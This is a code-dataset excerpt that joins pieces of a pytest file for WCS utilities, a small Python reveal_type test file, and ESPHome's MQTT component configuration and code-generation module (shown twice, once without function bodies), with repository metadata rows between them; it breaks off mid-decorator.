def test_wcs_needs_augmenting(test_input, expected):
assert utils.wcs.WCS._needs_augmenting(test_input) is expected
@pytest.mark.parametrize("test_input,expected", [((ht, 3), ht_with_celestial)])
def test_wcs_augment(test_input, expected):
unit_tester = unittest.TestCase()
unit_tester.assertEqual(utils.wcs.WCS._augment(*test_input), expected)
@pytest.mark.parametrize(
"test_input,expected",
[({}, False),
([slice(1, 5), slice(-1, -5, -2)], True)])
def test_all_slice(test_input, expected):
assert utils.wcs._all_slice(test_input) == expected
@pytest.mark.parametrize(
"test_input,expected",
[({}, []),
((slice(1, 2), slice(1, 3), 2, slice(2, 4), 8),
[slice(1, 2, None), slice(1, 3, None), slice(2, 3, None),
slice(2, 4, None), slice(8, 9, None)])])
def test_slice_list(test_input, expected):
assert utils.wcs._slice_list(test_input) == expected
@pytest.mark.parametrize("test_input,expected", [
((wm, np.array([1, 0, 2])), wm_reindexed_102),
((wm, np.array([1, 0, -1])), wm_reindexed_102)
])
def test_reindex_wcs(test_input, expected):
print(utils.wcs.reindex_wcs(*test_input))
print(expected)
helpers.assert_wcs_are_equal(utils.wcs.reindex_wcs(*test_input), expected)
@pytest.mark.parametrize("test_input", [
(TypeError, wm, 0),
(TypeError, wm, np.array(['spam', 'eggs', 'ham'])),
])
def test_reindex_wcs_errors(test_input):
with pytest.raises(test_input[0]):
utils.wcs.reindex_wcs(*test_input[1:])
@pytest.mark.parametrize("test_input,expected", [
((wm, 0, [False, False, False]), (0, 1)),
((wm, 1, [False, False, False]), (0, 1)),
((wm, 2, [False, False, False]), (2,)),
((wm, 1, [False, False, True]), (1,))
])
def test_get_dependent_data_axes(test_input, expected):
output = utils.wcs.get_dependent_data_axes(*test_input)
assert output == expected
@pytest.mark.parametrize("test_input,expected", [
((wm, 0), (0,)),
((wm, 1), (1, 2)),
((wm, 2), (1, 2)),
])
def test_get_dependent_wcs_axes(test_input, expected):
output = utils.wcs.get_dependent_wcs_axes(*test_input)
assert output == expected
@pytest.mark.parametrize("test_input,expected", [
(wm, np.array([[True, False, False], [False, True, True], [False, True, True]])),
(wt, np.array([[True, False, False, False], [False, True, False, False],
[False, False, True, True], [False, False, True, True]])),
(wm_reindexed_102, np.array([[True, False, True], [False, True, False],
[True, False, True]]))
])
def test_axis_correlation_matrix(test_input, expected):
assert (utils.wcs.axis_correlation_matrix(test_input) == expected).all()
| 1,016 | 0 | 198 |
6ab56e40aa88ffa63c26d960b84a65a830e938f4 | 174 | py | Python | foo/bar/__init__.py | graingert/henbruas_foo_bar_baz | ba68b63e9424db97d6fd14122e8eaef1a0923a05 | [
"MIT"
] | 1 | 2020-09-26T12:41:41.000Z | 2020-09-26T12:41:41.000Z | foo/bar/__init__.py | graingert/henbruas-foo-bar-baz | ba68b63e9424db97d6fd14122e8eaef1a0923a05 | [
"MIT"
] | null | null | null | foo/bar/__init__.py | graingert/henbruas-foo-bar-baz | ba68b63e9424db97d6fd14122e8eaef1a0923a05 | [
"MIT"
] | null | null | null | import foo.bar.baz
__all__ = ["foo", "baz"]
reveal_type(foo)
reveal_type(foo.bar)
reveal_type(foo.bar.baz)
reveal_type(foo.bar.baz.x)
reveal_type(baz)
reveal_type(bar.baz)
| 15.818182 | 26 | 0.752874 | import foo.bar.baz
__all__ = ["foo", "baz"]
reveal_type(foo)
reveal_type(foo.bar)
reveal_type(foo.bar.baz)
reveal_type(foo.bar.baz.x)
reveal_type(baz)
reveal_type(bar.baz)
| 0 | 0 | 0 |
3f9275e231dab92870638e5c2ba019e1d962a073 | 18,443 | py | Python | esphome/components/mqtt/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 249 | 2018-04-07T12:04:11.000Z | 2019-01-25T01:11:34.000Z | esphome/components/mqtt/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 243 | 2018-04-11T16:37:11.000Z | 2019-01-25T16:50:37.000Z | esphome/components/mqtt/__init__.py | OttoWinter/esphomeyaml | 6a85259e4d6d1b0a0f819688b8e555efcb99ecb0 | [
"MIT"
] | 40 | 2018-04-10T05:50:14.000Z | 2019-01-25T15:20:36.000Z | import re
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome import automation
from esphome.automation import Condition
from esphome.components import logger
from esphome.const import (
CONF_AVAILABILITY,
CONF_BIRTH_MESSAGE,
CONF_BROKER,
CONF_CERTIFICATE_AUTHORITY,
CONF_CLIENT_ID,
CONF_COMMAND_TOPIC,
CONF_COMMAND_RETAIN,
CONF_DISCOVERY,
CONF_DISCOVERY_PREFIX,
CONF_DISCOVERY_RETAIN,
CONF_DISCOVERY_UNIQUE_ID_GENERATOR,
CONF_DISCOVERY_OBJECT_ID_GENERATOR,
CONF_ID,
CONF_KEEPALIVE,
CONF_LEVEL,
CONF_LOG_TOPIC,
CONF_ON_JSON_MESSAGE,
CONF_ON_MESSAGE,
CONF_ON_CONNECT,
CONF_ON_DISCONNECT,
CONF_PASSWORD,
CONF_PAYLOAD,
CONF_PAYLOAD_AVAILABLE,
CONF_PAYLOAD_NOT_AVAILABLE,
CONF_PORT,
CONF_QOS,
CONF_REBOOT_TIMEOUT,
CONF_RETAIN,
CONF_SHUTDOWN_MESSAGE,
CONF_SSL_FINGERPRINTS,
CONF_STATE_TOPIC,
CONF_TOPIC,
CONF_TOPIC_PREFIX,
CONF_TRIGGER_ID,
CONF_USE_ABBREVIATIONS,
CONF_USERNAME,
CONF_WILL_MESSAGE,
)
from esphome.core import coroutine_with_priority, CORE
from esphome.components.esp32 import add_idf_sdkconfig_option
DEPENDENCIES = ["network"]
AUTO_LOAD = ["json"]
CONF_IDF_SEND_ASYNC = "idf_send_async"
CONF_SKIP_CERT_CN_CHECK = "skip_cert_cn_check"
MQTT_MESSAGE_BASE = cv.Schema(
{
cv.Required(CONF_TOPIC): cv.publish_topic,
cv.Optional(CONF_QOS, default=0): cv.mqtt_qos,
cv.Optional(CONF_RETAIN, default=True): cv.boolean,
}
)
MQTT_MESSAGE_TEMPLATE_SCHEMA = cv.Any(
None, MQTT_MESSAGE_BASE, validate_message_just_topic
)
MQTT_MESSAGE_SCHEMA = cv.Any(
None,
MQTT_MESSAGE_BASE.extend(
{
cv.Required(CONF_PAYLOAD): cv.mqtt_payload,
}
),
)
mqtt_ns = cg.esphome_ns.namespace("mqtt")
MQTTMessage = mqtt_ns.struct("MQTTMessage")
MQTTClientComponent = mqtt_ns.class_("MQTTClientComponent", cg.Component)
MQTTPublishAction = mqtt_ns.class_("MQTTPublishAction", automation.Action)
MQTTPublishJsonAction = mqtt_ns.class_("MQTTPublishJsonAction", automation.Action)
MQTTMessageTrigger = mqtt_ns.class_(
"MQTTMessageTrigger", automation.Trigger.template(cg.std_string), cg.Component
)
MQTTJsonMessageTrigger = mqtt_ns.class_(
"MQTTJsonMessageTrigger", automation.Trigger.template(cg.JsonObjectConst)
)
MQTTConnectTrigger = mqtt_ns.class_("MQTTConnectTrigger", automation.Trigger.template())
MQTTDisconnectTrigger = mqtt_ns.class_(
"MQTTDisconnectTrigger", automation.Trigger.template()
)
MQTTComponent = mqtt_ns.class_("MQTTComponent", cg.Component)
MQTTConnectedCondition = mqtt_ns.class_("MQTTConnectedCondition", Condition)
MQTTBinarySensorComponent = mqtt_ns.class_("MQTTBinarySensorComponent", MQTTComponent)
MQTTClimateComponent = mqtt_ns.class_("MQTTClimateComponent", MQTTComponent)
MQTTCoverComponent = mqtt_ns.class_("MQTTCoverComponent", MQTTComponent)
MQTTFanComponent = mqtt_ns.class_("MQTTFanComponent", MQTTComponent)
MQTTJSONLightComponent = mqtt_ns.class_("MQTTJSONLightComponent", MQTTComponent)
MQTTSensorComponent = mqtt_ns.class_("MQTTSensorComponent", MQTTComponent)
MQTTSwitchComponent = mqtt_ns.class_("MQTTSwitchComponent", MQTTComponent)
MQTTTextSensor = mqtt_ns.class_("MQTTTextSensor", MQTTComponent)
MQTTNumberComponent = mqtt_ns.class_("MQTTNumberComponent", MQTTComponent)
MQTTSelectComponent = mqtt_ns.class_("MQTTSelectComponent", MQTTComponent)
MQTTButtonComponent = mqtt_ns.class_("MQTTButtonComponent", MQTTComponent)
MQTTLockComponent = mqtt_ns.class_("MQTTLockComponent", MQTTComponent)
MQTTDiscoveryUniqueIdGenerator = mqtt_ns.enum("MQTTDiscoveryUniqueIdGenerator")
MQTT_DISCOVERY_UNIQUE_ID_GENERATOR_OPTIONS = {
"legacy": MQTTDiscoveryUniqueIdGenerator.MQTT_LEGACY_UNIQUE_ID_GENERATOR,
"mac": MQTTDiscoveryUniqueIdGenerator.MQTT_MAC_ADDRESS_UNIQUE_ID_GENERATOR,
}
MQTTDiscoveryObjectIdGenerator = mqtt_ns.enum("MQTTDiscoveryObjectIdGenerator")
MQTT_DISCOVERY_OBJECT_ID_GENERATOR_OPTIONS = {
"none": MQTTDiscoveryObjectIdGenerator.MQTT_NONE_OBJECT_ID_GENERATOR,
"device_name": MQTTDiscoveryObjectIdGenerator.MQTT_DEVICE_NAME_OBJECT_ID_GENERATOR,
}
CONFIG_SCHEMA = cv.All(
cv.Schema(
{
cv.GenerateID(): cv.declare_id(MQTTClientComponent),
cv.Required(CONF_BROKER): cv.string_strict,
cv.Optional(CONF_PORT, default=1883): cv.port,
cv.Optional(CONF_USERNAME, default=""): cv.string,
cv.Optional(CONF_PASSWORD, default=""): cv.string,
cv.Optional(CONF_CLIENT_ID): cv.string,
cv.SplitDefault(CONF_IDF_SEND_ASYNC, esp32_idf=False): cv.All(
cv.boolean, cv.only_with_esp_idf
),
cv.Optional(CONF_CERTIFICATE_AUTHORITY): cv.All(
cv.string, cv.only_with_esp_idf
),
cv.SplitDefault(CONF_SKIP_CERT_CN_CHECK, esp32_idf=False): cv.All(
cv.boolean, cv.only_with_esp_idf
),
cv.Optional(CONF_DISCOVERY, default=True): cv.Any(
cv.boolean, cv.one_of("CLEAN", upper=True)
),
cv.Optional(CONF_DISCOVERY_RETAIN, default=True): cv.boolean,
cv.Optional(
CONF_DISCOVERY_PREFIX, default="homeassistant"
): cv.publish_topic,
cv.Optional(CONF_DISCOVERY_UNIQUE_ID_GENERATOR, default="legacy"): cv.enum(
MQTT_DISCOVERY_UNIQUE_ID_GENERATOR_OPTIONS
),
cv.Optional(CONF_DISCOVERY_OBJECT_ID_GENERATOR, default="none"): cv.enum(
MQTT_DISCOVERY_OBJECT_ID_GENERATOR_OPTIONS
),
cv.Optional(CONF_USE_ABBREVIATIONS, default=True): cv.boolean,
cv.Optional(CONF_BIRTH_MESSAGE): MQTT_MESSAGE_SCHEMA,
cv.Optional(CONF_WILL_MESSAGE): MQTT_MESSAGE_SCHEMA,
cv.Optional(CONF_SHUTDOWN_MESSAGE): MQTT_MESSAGE_SCHEMA,
cv.Optional(CONF_TOPIC_PREFIX, default=lambda: CORE.name): cv.publish_topic,
cv.Optional(CONF_LOG_TOPIC): cv.Any(
None,
MQTT_MESSAGE_BASE.extend(
{
cv.Optional(CONF_LEVEL): logger.is_log_level,
}
),
validate_message_just_topic,
),
cv.Optional(CONF_SSL_FINGERPRINTS): cv.All(
cv.only_on_esp8266, cv.ensure_list(validate_fingerprint)
),
cv.Optional(CONF_KEEPALIVE, default="15s"): cv.positive_time_period_seconds,
cv.Optional(
CONF_REBOOT_TIMEOUT, default="15min"
): cv.positive_time_period_milliseconds,
cv.Optional(CONF_ON_CONNECT): automation.validate_automation(
{
cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(MQTTConnectTrigger),
}
),
cv.Optional(CONF_ON_DISCONNECT): automation.validate_automation(
{
cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(
MQTTDisconnectTrigger
),
}
),
cv.Optional(CONF_ON_MESSAGE): automation.validate_automation(
{
cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(MQTTMessageTrigger),
cv.Required(CONF_TOPIC): cv.subscribe_topic,
cv.Optional(CONF_QOS, default=0): cv.mqtt_qos,
cv.Optional(CONF_PAYLOAD): cv.string_strict,
}
),
cv.Optional(CONF_ON_JSON_MESSAGE): automation.validate_automation(
{
cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(
MQTTJsonMessageTrigger
),
cv.Required(CONF_TOPIC): cv.subscribe_topic,
cv.Optional(CONF_QOS, default=0): cv.mqtt_qos,
}
),
}
),
validate_config,
)
@coroutine_with_priority(40.0)
MQTT_PUBLISH_ACTION_SCHEMA = cv.Schema(
{
cv.GenerateID(): cv.use_id(MQTTClientComponent),
cv.Required(CONF_TOPIC): cv.templatable(cv.publish_topic),
cv.Required(CONF_PAYLOAD): cv.templatable(cv.mqtt_payload),
cv.Optional(CONF_QOS, default=0): cv.templatable(cv.mqtt_qos),
cv.Optional(CONF_RETAIN, default=False): cv.templatable(cv.boolean),
}
)
@automation.register_action(
"mqtt.publish", MQTTPublishAction, MQTT_PUBLISH_ACTION_SCHEMA
)
MQTT_PUBLISH_JSON_ACTION_SCHEMA = cv.Schema(
{
cv.GenerateID(): cv.use_id(MQTTClientComponent),
cv.Required(CONF_TOPIC): cv.templatable(cv.publish_topic),
cv.Required(CONF_PAYLOAD): cv.lambda_,
cv.Optional(CONF_QOS, default=0): cv.templatable(cv.mqtt_qos),
cv.Optional(CONF_RETAIN, default=False): cv.templatable(cv.boolean),
}
)
@automation.register_action(
"mqtt.publish_json", MQTTPublishJsonAction, MQTT_PUBLISH_JSON_ACTION_SCHEMA
)
@automation.register_condition(
"mqtt.connected",
MQTTConnectedCondition,
cv.Schema(
{
cv.GenerateID(): cv.use_id(MQTTClientComponent),
}
),
)
| 37.034137 | 88 | 0.680638 | import re
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome import automation
from esphome.automation import Condition
from esphome.components import logger
from esphome.const import (
CONF_AVAILABILITY,
CONF_BIRTH_MESSAGE,
CONF_BROKER,
CONF_CERTIFICATE_AUTHORITY,
CONF_CLIENT_ID,
CONF_COMMAND_TOPIC,
CONF_COMMAND_RETAIN,
CONF_DISCOVERY,
CONF_DISCOVERY_PREFIX,
CONF_DISCOVERY_RETAIN,
CONF_DISCOVERY_UNIQUE_ID_GENERATOR,
CONF_DISCOVERY_OBJECT_ID_GENERATOR,
CONF_ID,
CONF_KEEPALIVE,
CONF_LEVEL,
CONF_LOG_TOPIC,
CONF_ON_JSON_MESSAGE,
CONF_ON_MESSAGE,
CONF_ON_CONNECT,
CONF_ON_DISCONNECT,
CONF_PASSWORD,
CONF_PAYLOAD,
CONF_PAYLOAD_AVAILABLE,
CONF_PAYLOAD_NOT_AVAILABLE,
CONF_PORT,
CONF_QOS,
CONF_REBOOT_TIMEOUT,
CONF_RETAIN,
CONF_SHUTDOWN_MESSAGE,
CONF_SSL_FINGERPRINTS,
CONF_STATE_TOPIC,
CONF_TOPIC,
CONF_TOPIC_PREFIX,
CONF_TRIGGER_ID,
CONF_USE_ABBREVIATIONS,
CONF_USERNAME,
CONF_WILL_MESSAGE,
)
from esphome.core import coroutine_with_priority, CORE
from esphome.components.esp32 import add_idf_sdkconfig_option
DEPENDENCIES = ["network"]
AUTO_LOAD = ["json"]
CONF_IDF_SEND_ASYNC = "idf_send_async"
CONF_SKIP_CERT_CN_CHECK = "skip_cert_cn_check"
def validate_message_just_topic(value):
value = cv.publish_topic(value)
return MQTT_MESSAGE_BASE({CONF_TOPIC: value})
MQTT_MESSAGE_BASE = cv.Schema(
{
cv.Required(CONF_TOPIC): cv.publish_topic,
cv.Optional(CONF_QOS, default=0): cv.mqtt_qos,
cv.Optional(CONF_RETAIN, default=True): cv.boolean,
}
)
MQTT_MESSAGE_TEMPLATE_SCHEMA = cv.Any(
None, MQTT_MESSAGE_BASE, validate_message_just_topic
)
MQTT_MESSAGE_SCHEMA = cv.Any(
None,
MQTT_MESSAGE_BASE.extend(
{
cv.Required(CONF_PAYLOAD): cv.mqtt_payload,
}
),
)
mqtt_ns = cg.esphome_ns.namespace("mqtt")
MQTTMessage = mqtt_ns.struct("MQTTMessage")
MQTTClientComponent = mqtt_ns.class_("MQTTClientComponent", cg.Component)
MQTTPublishAction = mqtt_ns.class_("MQTTPublishAction", automation.Action)
MQTTPublishJsonAction = mqtt_ns.class_("MQTTPublishJsonAction", automation.Action)
MQTTMessageTrigger = mqtt_ns.class_(
"MQTTMessageTrigger", automation.Trigger.template(cg.std_string), cg.Component
)
MQTTJsonMessageTrigger = mqtt_ns.class_(
"MQTTJsonMessageTrigger", automation.Trigger.template(cg.JsonObjectConst)
)
MQTTConnectTrigger = mqtt_ns.class_("MQTTConnectTrigger", automation.Trigger.template())
MQTTDisconnectTrigger = mqtt_ns.class_(
"MQTTDisconnectTrigger", automation.Trigger.template()
)
MQTTComponent = mqtt_ns.class_("MQTTComponent", cg.Component)
MQTTConnectedCondition = mqtt_ns.class_("MQTTConnectedCondition", Condition)
MQTTBinarySensorComponent = mqtt_ns.class_("MQTTBinarySensorComponent", MQTTComponent)
MQTTClimateComponent = mqtt_ns.class_("MQTTClimateComponent", MQTTComponent)
MQTTCoverComponent = mqtt_ns.class_("MQTTCoverComponent", MQTTComponent)
MQTTFanComponent = mqtt_ns.class_("MQTTFanComponent", MQTTComponent)
MQTTJSONLightComponent = mqtt_ns.class_("MQTTJSONLightComponent", MQTTComponent)
MQTTSensorComponent = mqtt_ns.class_("MQTTSensorComponent", MQTTComponent)
MQTTSwitchComponent = mqtt_ns.class_("MQTTSwitchComponent", MQTTComponent)
MQTTTextSensor = mqtt_ns.class_("MQTTTextSensor", MQTTComponent)
MQTTNumberComponent = mqtt_ns.class_("MQTTNumberComponent", MQTTComponent)
MQTTSelectComponent = mqtt_ns.class_("MQTTSelectComponent", MQTTComponent)
MQTTButtonComponent = mqtt_ns.class_("MQTTButtonComponent", MQTTComponent)
MQTTLockComponent = mqtt_ns.class_("MQTTLockComponent", MQTTComponent)
MQTTDiscoveryUniqueIdGenerator = mqtt_ns.enum("MQTTDiscoveryUniqueIdGenerator")
MQTT_DISCOVERY_UNIQUE_ID_GENERATOR_OPTIONS = {
"legacy": MQTTDiscoveryUniqueIdGenerator.MQTT_LEGACY_UNIQUE_ID_GENERATOR,
"mac": MQTTDiscoveryUniqueIdGenerator.MQTT_MAC_ADDRESS_UNIQUE_ID_GENERATOR,
}
MQTTDiscoveryObjectIdGenerator = mqtt_ns.enum("MQTTDiscoveryObjectIdGenerator")
MQTT_DISCOVERY_OBJECT_ID_GENERATOR_OPTIONS = {
"none": MQTTDiscoveryObjectIdGenerator.MQTT_NONE_OBJECT_ID_GENERATOR,
"device_name": MQTTDiscoveryObjectIdGenerator.MQTT_DEVICE_NAME_OBJECT_ID_GENERATOR,
}
def validate_config(value):
    """Inject default birth/will/shutdown/log messages into the MQTT config.

    Defaults are only added for keys the user did not set; the input dict is
    not mutated (a shallow copy is returned).
    """
    # Populate default fields
    out = value.copy()
    topic_prefix = value[CONF_TOPIC_PREFIX]

    def default_status_message(payload):
        # Birth, will and shutdown messages share topic/QoS/retain and only
        # differ in the payload; build them from one template instead of
        # repeating the literal three times.
        return {
            CONF_TOPIC: f"{topic_prefix}/status",
            CONF_PAYLOAD: payload,
            CONF_QOS: 0,
            CONF_RETAIN: True,
        }

    if CONF_BIRTH_MESSAGE not in value:
        out[CONF_BIRTH_MESSAGE] = default_status_message("online")
    if CONF_WILL_MESSAGE not in value:
        out[CONF_WILL_MESSAGE] = default_status_message("offline")
    if CONF_SHUTDOWN_MESSAGE not in value:
        out[CONF_SHUTDOWN_MESSAGE] = default_status_message("offline")
    if CONF_LOG_TOPIC not in value:
        # Log messages go to a separate debug topic and carry no payload
        # default (the payload is the log line itself).
        out[CONF_LOG_TOPIC] = {
            CONF_TOPIC: f"{topic_prefix}/debug",
            CONF_QOS: 0,
            CONF_RETAIN: True,
        }
    return out
def validate_fingerprint(value):
    """Validate that *value* is a 40-digit lowercase hex SHA1 fingerprint."""
    value = cv.string(value)
    if not re.match(r"^[0-9a-f]{40}$", value):
        raise cv.Invalid("fingerprint must be valid SHA1 hash")
    return value
# Top-level schema for the `mqtt:` component; validate_config (above) then
# fills in the default birth/will/shutdown/log messages.
CONFIG_SCHEMA = cv.All(
    cv.Schema(
        {
            cv.GenerateID(): cv.declare_id(MQTTClientComponent),
            cv.Required(CONF_BROKER): cv.string_strict,
            cv.Optional(CONF_PORT, default=1883): cv.port,
            cv.Optional(CONF_USERNAME, default=""): cv.string,
            cv.Optional(CONF_PASSWORD, default=""): cv.string,
            cv.Optional(CONF_CLIENT_ID): cv.string,
            cv.SplitDefault(CONF_IDF_SEND_ASYNC, esp32_idf=False): cv.All(
                cv.boolean, cv.only_with_esp_idf
            ),
            cv.Optional(CONF_CERTIFICATE_AUTHORITY): cv.All(
                cv.string, cv.only_with_esp_idf
            ),
            cv.SplitDefault(CONF_SKIP_CERT_CN_CHECK, esp32_idf=False): cv.All(
                cv.boolean, cv.only_with_esp_idf
            ),
            # discovery is either a boolean or the special string "CLEAN"
            # (wipe stale discovery entries).
            cv.Optional(CONF_DISCOVERY, default=True): cv.Any(
                cv.boolean, cv.one_of("CLEAN", upper=True)
            ),
            cv.Optional(CONF_DISCOVERY_RETAIN, default=True): cv.boolean,
            cv.Optional(
                CONF_DISCOVERY_PREFIX, default="homeassistant"
            ): cv.publish_topic,
            cv.Optional(CONF_DISCOVERY_UNIQUE_ID_GENERATOR, default="legacy"): cv.enum(
                MQTT_DISCOVERY_UNIQUE_ID_GENERATOR_OPTIONS
            ),
            cv.Optional(CONF_DISCOVERY_OBJECT_ID_GENERATOR, default="none"): cv.enum(
                MQTT_DISCOVERY_OBJECT_ID_GENERATOR_OPTIONS
            ),
            cv.Optional(CONF_USE_ABBREVIATIONS, default=True): cv.boolean,
            cv.Optional(CONF_BIRTH_MESSAGE): MQTT_MESSAGE_SCHEMA,
            cv.Optional(CONF_WILL_MESSAGE): MQTT_MESSAGE_SCHEMA,
            cv.Optional(CONF_SHUTDOWN_MESSAGE): MQTT_MESSAGE_SCHEMA,
            cv.Optional(CONF_TOPIC_PREFIX, default=lambda: CORE.name): cv.publish_topic,
            # log_topic accepts null (disable), a full message schema with an
            # optional minimum log level, or a bare topic string.
            cv.Optional(CONF_LOG_TOPIC): cv.Any(
                None,
                MQTT_MESSAGE_BASE.extend(
                    {
                        cv.Optional(CONF_LEVEL): logger.is_log_level,
                    }
                ),
                validate_message_just_topic,
            ),
            cv.Optional(CONF_SSL_FINGERPRINTS): cv.All(
                cv.only_on_esp8266, cv.ensure_list(validate_fingerprint)
            ),
            cv.Optional(CONF_KEEPALIVE, default="15s"): cv.positive_time_period_seconds,
            cv.Optional(
                CONF_REBOOT_TIMEOUT, default="15min"
            ): cv.positive_time_period_milliseconds,
            cv.Optional(CONF_ON_CONNECT): automation.validate_automation(
                {
                    cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(MQTTConnectTrigger),
                }
            ),
            cv.Optional(CONF_ON_DISCONNECT): automation.validate_automation(
                {
                    cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(
                        MQTTDisconnectTrigger
                    ),
                }
            ),
            cv.Optional(CONF_ON_MESSAGE): automation.validate_automation(
                {
                    cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(MQTTMessageTrigger),
                    cv.Required(CONF_TOPIC): cv.subscribe_topic,
                    cv.Optional(CONF_QOS, default=0): cv.mqtt_qos,
                    cv.Optional(CONF_PAYLOAD): cv.string_strict,
                }
            ),
            cv.Optional(CONF_ON_JSON_MESSAGE): automation.validate_automation(
                {
                    cv.GenerateID(CONF_TRIGGER_ID): cv.declare_id(
                        MQTTJsonMessageTrigger
                    ),
                    cv.Required(CONF_TOPIC): cv.subscribe_topic,
                    cv.Optional(CONF_QOS, default=0): cv.mqtt_qos,
                }
            ),
        }
    ),
    validate_config,
)
def exp_mqtt_message(config):
    """Convert a validated message config into a C++ ``MQTTMessage`` struct
    initializer, or an empty ``optional<MQTTMessage>`` when *config* is None."""
    if config is None:
        return cg.optional(cg.TemplateArguments(MQTTMessage))
    return cg.StructInitializer(
        MQTTMessage,
        ("topic", config[CONF_TOPIC]),
        ("payload", config.get(CONF_PAYLOAD, "")),
        ("qos", config[CONF_QOS]),
        ("retain", config[CONF_RETAIN]),
    )
@coroutine_with_priority(40.0)
async def to_code(config):
    # Translate the validated MQTT config into C++ setup calls on the
    # generated MQTTClientComponent instance.
    var = cg.new_Pvariable(config[CONF_ID])
    await cg.register_component(var, config)
    # Add required libraries for arduino
    if CORE.using_arduino:
        # https://github.com/OttoWinter/async-mqtt-client/blob/master/library.json
        cg.add_library("ottowinter/AsyncMqttClient-esphome", "0.8.6")
    cg.add_define("USE_MQTT")
    cg.add_global(mqtt_ns.using)
    cg.add(var.set_broker_address(config[CONF_BROKER]))
    cg.add(var.set_broker_port(config[CONF_PORT]))
    cg.add(var.set_username(config[CONF_USERNAME]))
    cg.add(var.set_password(config[CONF_PASSWORD]))
    if CONF_CLIENT_ID in config:
        cg.add(var.set_client_id(config[CONF_CLIENT_ID]))
    discovery = config[CONF_DISCOVERY]
    discovery_retain = config[CONF_DISCOVERY_RETAIN]
    discovery_prefix = config[CONF_DISCOVERY_PREFIX]
    discovery_unique_id_generator = config[CONF_DISCOVERY_UNIQUE_ID_GENERATOR]
    discovery_object_id_generator = config[CONF_DISCOVERY_OBJECT_ID_GENERATOR]
    # discovery is a bool or the literal "CLEAN" (see CONFIG_SCHEMA); CLEAN
    # passes an extra flag so stale discovery topics get wiped.
    if not discovery:
        cg.add(var.disable_discovery())
    elif discovery == "CLEAN":
        cg.add(
            var.set_discovery_info(
                discovery_prefix,
                discovery_unique_id_generator,
                discovery_object_id_generator,
                discovery_retain,
                True,
            )
        )
    elif CONF_DISCOVERY_RETAIN in config or CONF_DISCOVERY_PREFIX in config:
        cg.add(
            var.set_discovery_info(
                discovery_prefix,
                discovery_unique_id_generator,
                discovery_object_id_generator,
                discovery_retain,
            )
        )
    cg.add(var.set_topic_prefix(config[CONF_TOPIC_PREFIX]))
    if config[CONF_USE_ABBREVIATIONS]:
        cg.add_define("USE_MQTT_ABBREVIATIONS")
    # A falsy message config disables the corresponding feature; otherwise it
    # is converted to a C++ MQTTMessage initializer via exp_mqtt_message.
    birth_message = config[CONF_BIRTH_MESSAGE]
    if not birth_message:
        cg.add(var.disable_birth_message())
    else:
        cg.add(var.set_birth_message(exp_mqtt_message(birth_message)))
    will_message = config[CONF_WILL_MESSAGE]
    if not will_message:
        cg.add(var.disable_last_will())
    else:
        cg.add(var.set_last_will(exp_mqtt_message(will_message)))
    shutdown_message = config[CONF_SHUTDOWN_MESSAGE]
    if not shutdown_message:
        cg.add(var.disable_shutdown_message())
    else:
        cg.add(var.set_shutdown_message(exp_mqtt_message(shutdown_message)))
    log_topic = config[CONF_LOG_TOPIC]
    if not log_topic:
        cg.add(var.disable_log_message())
    else:
        cg.add(var.set_log_message_template(exp_mqtt_message(log_topic)))
        if CONF_LEVEL in log_topic:
            cg.add(var.set_log_level(logger.LOG_LEVELS[log_topic[CONF_LEVEL]]))
    if CONF_SSL_FINGERPRINTS in config:
        for fingerprint in config[CONF_SSL_FINGERPRINTS]:
            # Split the 40-char hex fingerprint into 20 byte literals.
            arr = [
                cg.RawExpression(f"0x{fingerprint[i:i + 2]}") for i in range(0, 40, 2)
            ]
            cg.add(var.add_ssl_fingerprint(arr))
        cg.add_build_flag("-DASYNC_TCP_SSL_ENABLED=1")
    cg.add(var.set_keep_alive(config[CONF_KEEPALIVE]))
    cg.add(var.set_reboot_timeout(config[CONF_REBOOT_TIMEOUT]))
    # esp-idf only
    if CONF_CERTIFICATE_AUTHORITY in config:
        cg.add(var.set_ca_certificate(config[CONF_CERTIFICATE_AUTHORITY]))
        cg.add(var.set_skip_cert_cn_check(config[CONF_SKIP_CERT_CN_CHECK]))
        # prevent error -0x428e
        # See https://github.com/espressif/esp-idf/issues/139
        add_idf_sdkconfig_option("CONFIG_MBEDTLS_HARDWARE_MPI", False)
    if CONF_IDF_SEND_ASYNC in config and config[CONF_IDF_SEND_ASYNC]:
        cg.add_define("USE_MQTT_IDF_ENQUEUE")
    # end esp-idf
    # Wire up the automation triggers declared in the config.
    for conf in config.get(CONF_ON_MESSAGE, []):
        trig = cg.new_Pvariable(conf[CONF_TRIGGER_ID], conf[CONF_TOPIC])
        cg.add(trig.set_qos(conf[CONF_QOS]))
        if CONF_PAYLOAD in conf:
            cg.add(trig.set_payload(conf[CONF_PAYLOAD]))
        await cg.register_component(trig, conf)
        await automation.build_automation(trig, [(cg.std_string, "x")], conf)
    for conf in config.get(CONF_ON_JSON_MESSAGE, []):
        trig = cg.new_Pvariable(conf[CONF_TRIGGER_ID], conf[CONF_TOPIC], conf[CONF_QOS])
        await automation.build_automation(trig, [(cg.JsonObjectConst, "x")], conf)
    for conf in config.get(CONF_ON_CONNECT, []):
        trigger = cg.new_Pvariable(conf[CONF_TRIGGER_ID], var)
        await automation.build_automation(trigger, [], conf)
    for conf in config.get(CONF_ON_DISCONNECT, []):
        trigger = cg.new_Pvariable(conf[CONF_TRIGGER_ID], var)
        await automation.build_automation(trigger, [], conf)
# Options for the `mqtt.publish` action; topic, payload, qos and retain are
# all templatable (may be lambdas evaluated at runtime).
MQTT_PUBLISH_ACTION_SCHEMA = cv.Schema(
    {
        cv.GenerateID(): cv.use_id(MQTTClientComponent),
        cv.Required(CONF_TOPIC): cv.templatable(cv.publish_topic),
        cv.Required(CONF_PAYLOAD): cv.templatable(cv.mqtt_payload),
        cv.Optional(CONF_QOS, default=0): cv.templatable(cv.mqtt_qos),
        cv.Optional(CONF_RETAIN, default=False): cv.templatable(cv.boolean),
    }
)
@automation.register_action(
